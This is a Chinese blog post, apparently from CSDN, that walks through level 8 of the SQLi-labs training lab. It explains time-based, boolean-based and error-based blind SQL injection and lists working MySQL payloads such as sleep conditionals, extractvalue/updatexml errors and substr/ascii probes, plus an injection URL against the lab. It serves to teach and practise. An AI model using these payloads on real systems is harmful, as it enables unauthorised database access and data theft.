Sqlilabs-8

最新推荐文章于 2024-06-07 07:48:16 发布
最新推荐文章于 2024-06-07 07:48:16 发布
阅读量698 收藏 2
点赞数
分类专栏: sqlilabs
kaka
本文链接:https://blog.csdn.net/szlg510027010/article/details/107171100
版权
这篇博客介绍了SQL盲注的基本概念,包括基于时间、布尔和报错的三种类型,并详细阐述了每种类型的原理。接着,作者展示了通过Python脚本来实现SQL盲注的过程,包括猜表张数、表名长度、表名、列数、列名、数据行数和数据长度等步骤,以此解决SQLiLabs的第8关挑战。
摘要由CSDN通过智能技术生成

第 8 关来到了盲注
2ba96151faaefd3f36114b563613e6b.png
首先得介绍盲注相关知识:

什么是盲注?
盲注就是在 sql 注入过程中数据不能回显到前端页面。此时,我们就要猜,猜的过程就是盲注。

盲注的类型有哪些?

  1. 基于时间的盲注
  2. 基于布尔的盲注
  3. 基于报错的盲注

对三类盲注的详细说明

  1. 基于时间,怎么个基于时间?其实就是也有点布尔的意思,并且还需要结合布尔,如果我这样注入,猜测是对是错,由时间来做抉择,如果是对,延迟几秒再显示页面,如果是错,就正常显示页面。
  2. 基于布尔,怎么个基于布尔?其实跟时间很像,只不过做裁决的不再是时间,而是返回的数据本身,比如,我查ABC这一数据,问第一个字母的 ASCII 值是不是大于 100 ,如果正确,页面就会显示 you are in…,如果错误就什么都不显示。
  3. 基于报错,其实基于报错有点类似与第五第六关,通过一些函数特性报错得到需要的结果

各类盲注的详细运用

  1. 基于时间
    if 判断语句,如果条件为真,执行 sleep
    if(ascii(substr(database(),1,1))>115,sleep(5),0)%23

  2. 基于报错
    select count(*) from information_schema.tables group by concat((select database()),floor(rand()*2))
    这是由 5.6 关卡的payload简化而来的
    如果关键的表[information_schema.tables]被禁用了,可以使用:
    select count(*) from (select 1 union select null union select !1) group by concat(version(),floor(rand()*2))
    如果rand被禁用了,可以使用用户变量来报错:
    select min(@a:=1) from information_schema.tables group by concat(password,@a:(@a+1)%2)

还可以利用double数值类型超出范围,exp() 为以 e 为底的对数函数,mysql 版本需为 5.5.5 及其以上select exp(~(select * from(select user())a))`

利用 mysql 对 xml 数据进行查询和修改的 xpath 函数,xpath 语法错误
extractvalue(1,concat(0x7e,(select @@version),0x7e))
updatexml(1,concat(0x7e,(select @@version),0x7e),1)

  1. 基于布尔
    database():显示数据库名称 left(a,b) 从左侧截取 a 的前 b 位
    left(database(),1)>'s'
    substr(a,b,c):从 b 位置开始截取 a 字符串的 c 长度,ascii():将某个字符串转化为 ascii 值
    ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101--+
    ord():同substr(),mid():同ascii()
    ORD(MID((select IFNULL(CAST(usernames as char),0x20)from security.users order by id limit 0,1),1,1))>98%23
    利用 mysql 重复特性,此处重复了 version(),所以报错
    select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x
    !!!
    一些常用的ascii值:A:65, Z:90, a:97, z:122, 0:48, 9:57
    !!!
    下面开始进入关卡:
    界面显示要你构造 ID,构造后只显示 You are in… 并不回显内容,所以只能盲注:
    http://sqlilabs/Less-8/?id=1' and if(ascii(substr((select database()),1,1))>96,1,0)--+
    14a9a8870b8f6e79db5f85fbca46eb8.png
    …由于盲注太过繁琐,我们可以编写脚本来实现盲注:
    实现了基本功能

    import requests
    import sys
    import time

    quote_one = 0
    quote_double = 0
    twist = 0
    table_numb

最低0.47元/天 解锁文章
CrAcKeR-1
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master第八关
FourthGuy的博客
10-09 1620
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码
Sqli-labs靶场第8关详解[Sqli-labs-less-8]
m0_73615178的博客
02-24 1064
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()sql注入——布尔型盲注(Boolean-based blind)
sqli-labs 第八关 较详细通关解释】
m0_71635484的博客
02-17 887
sqli-labs第八关详解
Sqli-lab教程-史上最全详解(1-22通关)
最新发布
dzqxwzoe的博客
06-07 929
Less-1 联合注入Less-2Less-3Less-4Less-5 报错注入/布尔盲注/时间盲注Less-6 报错注入/布尔盲注/时间盲注Less-7 文件导出Less-8 布尔盲注/时间盲注Less-9 时间盲注Less-10 时间盲注Less-11 post注入Less-12 post注入Less-13 post盲注Less-14 post盲注Less-15 时间盲注Less-16 时间盲注Less-17 修改密码Less-18 user-agent头注入。
sqli-labs 基础篇 第8~10关
Lucky小小吴的小屋
01-13 481
sqli-labs 基础篇 第8、9、10关
sql-labs(1-8关)
2302_80935968的博客
04-17 2144
该语句的意思是查询information_schema数据库下的tables表里面且table_schema字段内容是security的所有table_name的内容。id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 0,1),2,1))=100 --+表示所有字段对应的表名。
Sqlilabs靶场1-10关详解(Get请求式)
爱吃仡坨的Blog
10-16 2498
sqlilabs用到的是mysql数据库,mysql5.0以上版本自带的数据库是information_schema,其下有tables和columns两个表tables表中的table_name字段下是所有数据库存在的表名table_schema字段下是所有表名对应的数据库名。columns表中的column_name字段下是所有数据库存在的字段名。columns_schema字段下是所有表名对应的数据库。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs lesson8 python 脚本源代码(存在小bug)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈(在结果的格式化输出那有个小bug,用户名和密码没有正确对应,修改后的代码我又上传了,抱歉,,,)
SQLi dumper三件套
03-23
大家都懂,SQL注入。
sqli-labs大详解(完结)
热门推荐
hxhxhxhxx的博客
07-28 5万+
sqlilabs详解(不断更新)题目1-10Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)GET - Error based - Intiger based (基于错误的GET整型注入)Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)Less-4 GET - Error based - Double Quotes
sqli-labs训练平台靶场详解!!!!
ytdd66的博客
03-19 4567
下面选取几个具有代表性的关卡,演示几种 SQL 注入漏洞利用方法。
SQL注入 sqli-labs部分解析
ziwenya的博客
08-31 612
sql注入基础操作及相关sqli-labs关卡通关流程
使用python 写 sql-labs第八关的exp(练习)
Barlow_121212的博客
03-17 226
🌞①观察我们的响应包,当页面正常返回时有字符串 (You are in...........) 故我们可根据响应包中是否存在此字符串来判断exp是否成功。python代码可以直接写成全套的盲注exp,且更具有效率。更改代码,使用ascii,substr等函数跑出第一个字母。本文为更好的了解python以及复习sql注入中的盲注。只跑了users表和字段没有全部跑完(我想偷懒)。🌞③更改代码跑出库的名字。🌞跑字段的第二个字符的长度。跑第二个内容的第二个字母。跑第二个内容的所有字母。跑出第五个字段的字母。
Sqlilabs-Less38-
09-23
Sqlilabs-Less38是一个关于SQL注入的实验题目。在这个实验中,你需要通过注入恶意的SQL代码来获取敏感信息或者修改数据库中的数据。 在这个具体的实验中,通过输入一个id参数,我们可以在URL中进行注入。在第一步中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值